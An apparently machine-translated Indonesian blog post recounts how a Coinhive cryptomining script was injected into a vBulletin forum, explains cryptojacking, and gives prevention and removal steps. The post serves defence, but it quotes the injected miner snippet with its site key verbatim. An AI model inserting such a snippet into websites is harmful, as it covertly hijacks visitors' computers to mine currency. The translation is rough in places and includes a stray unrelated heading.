Apa yang harus dilakukan jika skrip penambangan crypto Coinhive menginfeksi situs web Anda

What Do If Coinhive Crypto Mining Script Infects Your Website

Inilah yang kami lakukan saat skrip penambangan kripto Coinhive yang berbahaya disuntikkan ke forum vBulletin kami. Pencegahan, penghapusan, perlindungan dibahas di sini.



Saya telah membaca tentang pemilik situs web yang menggunakan skrip di situs web mereka yang menggunakan CPU komputer pengunjung ketika mereka mengunjungi situs web mereka. Idenya adalah untuk memonetisasi konten mereka - dan alih-alih menggunakan iklan, mereka menggunakan skrip yang berjalan di browser dan menggunakan sumber daya komputer pengguna untuk menambang cryptocurrency. Tetapi saya dulu berpikir bahwa hanya pemilik situs web yang melakukan ini dengan sengaja - saya tidak pernah membayangkan bahwa peretas akan melakukannya meretas situs web dan mendorong skrip ke situs web lain dan menggunakan CPU pengunjung mereka untuk menghasilkan uang bagi diri mereka sendiri. Tapi inilah yang tampaknya sedang terjadi sekarang!



Skrip penambangan crypto Coinhive

Kemarin ketika saya mengunjungi kami Forum TWC , yang berjalan di perangkat lunak vBulletin, perangkat lunak keamanan saya menampilkan peringatan ini:

https: // coinhive dot com /lib/coinhive.js File objek terdeteksi, unduhan diblokir



Saya biasanya mengunjungi forum setiap hari dan saya tidak melihatnya sehari sebelumnya. Jadi saya berasumsi bahwa ini terjadi pada suatu waktu pada malam hari, waktu saya, ketika saya sedang tidur.

Saya menggunakan perangkat lunak vBulletin untuk forum, dan telah diperbarui ke versi terbaru. Selain itu, ini cukup mengejutkan bagi kami, seperti yang digunakan domain TheWindowsClub.com Jus Web Antivirus & Firewall untuk melindungi dirinya dari ancaman & serangan web online.

Perangkat lunak keamanan PC saya berhasil menghentikan skrip berbahaya agar tidak berjalan di komputer Windows 10 saya. Saya memeriksa dengan browser lain seperti Chrome & Edge, dan hasilnya sama.



hapus salinan bayangan windows 10

Setelah mengklik kanan pada halaman web forum dan memeriksa kode sumbernya, saya menemukan bahwa itu adalah skrip CoinHive CryptoMiner yang berbahaya.

Ini adalah Javascript Coinhive berbahaya yang masuk ke kode forum saya:

var miner = new CoinHive.Anonymous ('FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm'); miner.start ();

Bagaimanapun, hal pertama yang saya lakukan adalah menghapus forum dan memberi tahu Sucuri.

Orang-orang Sucuri membersihkan forum dari skrip Coinhive yang telah didorong ke forum saya dalam beberapa jam, dan semuanya baik-baik saja.

Apa itu CoinHive

Coinhive menawarkan penambang JavaScript untuk cryptocurrency Monero yang dapat Anda sematkan di situs web Anda dan menggunakan CPU komputer pengunjung situs web untuk menambang koin untuk Anda.

Ini disebut Cryptojacking . Ini melibatkan pembajakan browser pengguna untuk penambangan cryptocurrency. Beberapa pemilik situs web dapat menggunakannya sendiri untuk menghasilkan uang - tetapi dalam kasus kami, itu telah disuntikkan.

Saat pengguna mengakses situs yang terinfeksi, Coinhive JavaScript menjalankan dan menambang Monero menggunakan sumber daya CPU pengguna. Ini dapat menyebabkan pelambatan CPU & kerusakan sistem yang tidak terduga dari mesin korban.

Sekarang jika browser Anda terinfeksi, Anda akan melihat pemanfaatan sumber daya Anda naik. Tutup browser, dan browser akan jatuh. Pengguna mungkin melihat mesinnya memanas, kipas berjalan cepat, atau baterai cepat habis.

Saya bertanya pada rekan saya Saurabh Mukhekar untuk mengunjungi forum saya menggunakan miliknya Mac dan lihat apa yang terjadi. Nah, komputer Mac-nya juga terpengaruh saat dia membuka forum dengan Safari! Dia adalah salah satu pengguna Mac OSX pintar yang menggunakan perangkat lunak antivirus untuk Mac miliknya. Antivirus Avast-nya untuk Mac berhasil menghentikan skrip berbahaya agar tidak berjalan.

Kata Saurabh,

Malware CoinHive tidak hanya membajak PC Windows tetapi juga Mac, karena itu adalah infeksi Javascript berbasis browser. Ada baiknya saya tidak percaya pada mitos bahwa Mac tidak memerlukan perangkat lunak antivirus, jika tidak, mesin saya akan terinfeksi dan Mac saya akan terus mengeluarkan koin untuk orang lain.

Cegah CoinHive menginfeksi situs web Anda

  1. Jangan gunakan template atau plugin NULL apa pun di situs / forum Anda.
  2. Selalu perbarui CMS Anda ke versi terbaru.
  3. Perbarui perangkat lunak hosting Anda secara teratur (PHP, Database, dll ..).
  4. Amankan situs web Anda dengan penyedia keamanan web seperti Sucuri, Cloudflare, Wordfence, dll.
  5. Ambil dasar tindakan pencegahan untuk mengamankan blog Anda .

Penghapusan penambang CoinHive dari situs web

Pertama-tama, Anda harus menjadi webmaster dari situs web yang terinfeksi - atau memiliki kredensial administratif yang memberi Anda akses ke semua file situs web.

Sekarang ketika antivirus Anda mendeteksi infeksi CoinHive, klik kanan pada halaman web dan pilih Lihat Kode Sumber . Pers berikutnya Ctrl + F dan cari 'CoinHive'.

Setelah Anda mengidentifikasi lokasi kode berbahaya, Anda perlu melihat posisinya - di mana lokasinya. Sekarang Anda perlu menghapusnya secara manual. Untuk melakukan ini, Anda memerlukan sedikit pengetahuan pengkodean tentang platform Anda. Anda harus mencari file yang terinfeksi dan secara manual menghapus skrip di atas darinya. Jika Anda tidak yakin tentang itu, silakan minta beberapa ahli untuk melakukannya. Karena kami menggunakan Sucuri, kami membiarkan mereka melakukannya.

Setelah melakukan itu, bersihkan cache server & browser Anda. Jika Anda menggunakan plugin cache apa pun atau mengatakan MaxCDN, hapus cache itu juga.

Lindungi diri Anda dari skrip penambangan kripto

Cryptocurrency & Teknologi blockchain mengambil alih dunia. Ini menciptakan dampak pada ekonomi global dan penyebabnya gangguan teknologi demikian juga. Semua orang mulai fokus pada pasar yang begitu menguntungkan - dan ini termasuk peretas situs web juga. Saat pengembalian meningkat, kita harus berharap bahwa teknologi seperti itu akan disalahgunakan. Itulah sisi gelap dari setiap teknologi baru.

Apa yang dapat kita lakukan adalah mengambil tindakan pencegahan terbaik setiap saat. Selain menggunakan barang perangkat lunak keamanan, gunakan ekstensi Chrome atau Firefox itu memblokir situs web agar tidak menggunakan CPU Anda untuk menambang Cryptocurrency - atau lebih baik lagi, gunakan Anti-WebMiner itu akan berhenti Cryptojacking Mining Script menyerang dengan memodifikasi file File host . Ia bekerja di semua browser. Jika Anda pengguna Mac, dapatkan juga perangkat lunak antivirus untuk komputer Anda.

Untuk berjaga-jaga, jika Anda merasa telah mengunjungi situs yang terinfeksi, sebaiknya hapus cache browser dan pindai mesin Anda dengan perangkat lunak antivirus sebaik AdwCleaner .

Unduh Alat Perbaikan PC untuk menemukan & memperbaiki kesalahan Windows dengan cepat secara otomatis

Tetap aman, tetap waspada!



Pesan Populer